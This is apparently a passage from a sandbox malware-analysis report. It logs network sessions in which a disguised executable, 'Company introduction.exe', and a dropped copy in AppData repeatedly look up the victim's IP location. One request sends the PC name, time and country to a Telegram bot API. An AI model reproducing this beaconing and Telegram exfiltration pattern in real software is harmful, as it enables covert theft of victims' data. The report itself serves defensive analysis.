                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hwACZQW2%2BA8WFlRVAXTKAiv63vnOe8dh0gMyrEkh3RCyNFQdtOb1LRgGhyUpIR9RRME9ZShimXodBUpqNPdjsHe63RSNvkOmjqFa4zsKz3lwLma9m9KUeEmBqHGZtW60%2F26UDSTn"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 902435dffa3c43be-EWR
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1580&min_rtt=1575&rtt_var=601&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1804697&cwnd=229&unsent_bytes=0&cid=cebdb9134d40f1a4&ts=144&x=0"
                                                                                                                                                  2025-01-15 07:39:10 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  10192.168.2.449755104.21.48.14438144C:\Users\user\AppData\Roaming\FzXKnGk.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2025-01-15 07:39:11 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  2025-01-15 07:39:11 UTC855INHTTP/1.1 200 OK
                                                                                                                                                  Date: Wed, 15 Jan 2025 07:39:11 GMT
                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                  Content-Length: 362
                                                                                                                                                  Connection: close
                                                                                                                                                  Age: 2241540
                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                  cf-cache-status: HIT
                                                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uBNxvjQFERGbkYTqiv4le2KTqXPodPc6K3kNb6Dtwrl%2B1oGgFl8Ge72L9n3lHGCafVD4jAfl%2FGXarm%2BemBIHOa1LSq8ZPN2MZPODN1Fb2MK36qOIMgk61ARS4OJ15n11KqCVsxsM"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 902435e64f048c15-EWR
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1757&min_rtt=1753&rtt_var=666&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1634023&cwnd=238&unsent_bytes=0&cid=80f9c6b72bdbccf5&ts=156&x=0"
                                                                                                                                                  2025-01-15 07:39:11 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  11192.168.2.449756104.21.48.14437812C:\Users\user\Desktop\Company introduction.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2025-01-15 07:39:11 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                  2025-01-15 07:39:12 UTC853INHTTP/1.1 200 OK
                                                                                                                                                  Date: Wed, 15 Jan 2025 07:39:12 GMT
                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                  Content-Length: 362
                                                                                                                                                  Connection: close
                                                                                                                                                  Age: 2241541
                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                  cf-cache-status: HIT
                                                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lZU3DBjfcr0VPVzPe7sNHOX1LVEl3RhDNlpdCsgM8nJGVWSqxaEy3r3hzp5Tx1brbKnrj%2BVSipKKPHLy7zyLEJR8%2BlQLgFynNz56O4yrZoH7ln6T4pxLD3tJDvqMbihbEAiYZAzN"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 902435e80e54c323-EWR
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1485&min_rtt=1479&rtt_var=567&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1910994&cwnd=214&unsent_bytes=0&cid=7ff236c0476b9076&ts=151&x=0"
                                                                                                                                                  2025-01-15 07:39:12 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  12192.168.2.449759104.21.48.14438144C:\Users\user\AppData\Roaming\FzXKnGk.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2025-01-15 07:39:12 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  2025-01-15 07:39:13 UTC861INHTTP/1.1 200 OK
                                                                                                                                                  Date: Wed, 15 Jan 2025 07:39:12 GMT
                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                  Content-Length: 362
                                                                                                                                                  Connection: close
                                                                                                                                                  Age: 2241542
                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                  cf-cache-status: HIT
                                                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sv%2FM03OUmCUqZvsNtME3jyDdaAcvsDMbuLd5WSYW%2FKWQK6Hl48jTCnuZkz6j3HgmnnmhjX%2B4e%2F0JzFHyi%2FVtnI1szb9%2BL2M9LOz7X9jKh4121PLu9WHWCCBAWV5Oao5u6r97kcLx"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 902435edff4a42e9-EWR
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1638&min_rtt=1634&rtt_var=621&sent=3&recv=5&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1748502&cwnd=241&unsent_bytes=0&cid=8fc070524ceb9da7&ts=121&x=0"
                                                                                                                                                  2025-01-15 07:39:13 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  13192.168.2.449760104.21.48.14437812C:\Users\user\Desktop\Company introduction.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2025-01-15 07:39:13 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  2025-01-15 07:39:13 UTC853INHTTP/1.1 200 OK
                                                                                                                                                  Date: Wed, 15 Jan 2025 07:39:13 GMT
                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                  Content-Length: 362
                                                                                                                                                  Connection: close
                                                                                                                                                  Age: 2241542
                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                  cf-cache-status: HIT
                                                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B%2BRtUpWI3iKqwhN7301movk1AMac74D0Tdo6DsCXXrhk4cQq1xFSANFAh7LihxcSTWPXAJi2%2BlGi53GXL8I75ppbbXRjNTpvzz8lRWq7hTqfFLpW4Ze8vYofs7pBHosbBVKY4yap"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 902435eff8bbc323-EWR
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1435&min_rtt=1425&rtt_var=555&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1933774&cwnd=214&unsent_bytes=0&cid=109e949d2327b61b&ts=143&x=0"
                                                                                                                                                  2025-01-15 07:39:13 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  14192.168.2.449763104.21.48.14438144C:\Users\user\AppData\Roaming\FzXKnGk.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2025-01-15 07:39:14 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                  2025-01-15 07:39:14 UTC855INHTTP/1.1 200 OK
                                                                                                                                                  Date: Wed, 15 Jan 2025 07:39:14 GMT
                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                  Content-Length: 362
                                                                                                                                                  Connection: close
                                                                                                                                                  Age: 2241543
                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                  cf-cache-status: HIT
                                                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CgG%2B%2FPLDyxSlnxzOh9NgqPPoItiEt1vwX68pqFvJl4oBfMcpoXfYml%2F8wcFHV9xoXLNUt5wxxp1hFz7SMxtXYeyJ0EQnyWimP4LPSPFceQJMEoJfOsIJcIIeQF22bPwnzqWW5db5"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 902435f60d0643be-EWR
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1591&min_rtt=1572&rtt_var=627&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1692753&cwnd=229&unsent_bytes=0&cid=5007d2227f1337ee&ts=155&x=0"
                                                                                                                                                  2025-01-15 07:39:14 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  15192.168.2.449764104.21.48.14437812C:\Users\user\Desktop\Company introduction.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2025-01-15 07:39:14 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                  2025-01-15 07:39:14 UTC863INHTTP/1.1 200 OK
                                                                                                                                                  Date: Wed, 15 Jan 2025 07:39:14 GMT
                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                  Content-Length: 362
                                                                                                                                                  Connection: close
                                                                                                                                                  Age: 2241543
                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                  cf-cache-status: HIT
                                                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7MtG1XJaFtvpBci13fnfR%2FcRirjg4TJD%2FIxPAmd%2Fcd7QI8%2FcdshcfEedHtx4%2BfQ00uL5lIBgAttZzJa6%2BQsgEWFwLpufrrOhwTidpgtOEnnfd7PtOWEUIBD%2BycAROT628vH9QCA3"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 902435f79f758c15-EWR
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1773&min_rtt=1772&rtt_var=667&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1637689&cwnd=238&unsent_bytes=0&cid=7d14981d0e7c0a7b&ts=121&x=0"
                                                                                                                                                  2025-01-15 07:39:14 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  16192.168.2.449766149.154.167.2204437812C:\Users\user\Desktop\Company introduction.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2025-01-15 07:39:15 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:302494%0D%0ADate%20and%20Time:%2015/01/2025%20/%2014:34:14%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20302494%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                                  Host: api.telegram.org
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  2025-01-15 07:39:15 UTC344INHTTP/1.1 404 Not Found
                                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                                  Date: Wed, 15 Jan 2025 07:39:15 GMT
                                                                                                                                                  Content-Type: application/json
                                                                                                                                                  Content-Length: 55
                                                                                                                                                  Connection: close
                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                  2025-01-15 07:39:15 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                                                  Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  17192.168.2.449767104.21.48.14438144C:\Users\user\AppData\Roaming\FzXKnGk.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2025-01-15 07:39:15 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  2025-01-15 07:39:15 UTC857INHTTP/1.1 200 OK
                                                                                                                                                  Date: Wed, 15 Jan 2025 07:39:15 GMT
                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                  Content-Length: 362
                                                                                                                                                  Connection: close
                                                                                                                                                  Age: 2241544
                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                  cf-cache-status: HIT
                                                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qDjT1mA4ou2PJBNi99bmDgYxjZHZjcGNooNtgzHcPXKBmuNQX%2BlbqW09GAODWAsWhr6%2BPyafRSz70VGxShtRhQ%2BqkJ9sK1Sjaol2wczXDts18t4ZurADKYm7aOncUWA0J%2BL1pgBP"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 902435fe3c78c323-EWR
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1443&min_rtt=1437&rtt_var=551&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1966329&cwnd=214&unsent_bytes=0&cid=36478c3052d6f528&ts=153&x=0"
                                                                                                                                                  2025-01-15 07:39:15 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  18192.168.2.449770104.21.48.14438144C:\Users\user\AppData\Roaming\FzXKnGk.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2025-01-15 07:39:16 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  2025-01-15 07:39:16 UTC865INHTTP/1.1 200 OK
                                                                                                                                                  Date: Wed, 15 Jan 2025 07:39:16 GMT
                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                  Content-Length: 362
                                                                                                                                                  Connection: close
                                                                                                                                                  Age: 2241545
                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                  cf-cache-status: HIT
                                                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F9w%2BnESlJq0vbgMa6gq87a%2B97afYp%2BMGZBMOiTJEhFo8qcyWQgvSkHO8k%2FI2ZPCcA2x2EvoPA0KYP6Cgz35Md3ug90pDd%2BvWxpClEN62DWSojryD09VAq4ld5EX6tDOqGzvMj%2F%2Bk"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 902436063f2fc461-EWR
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
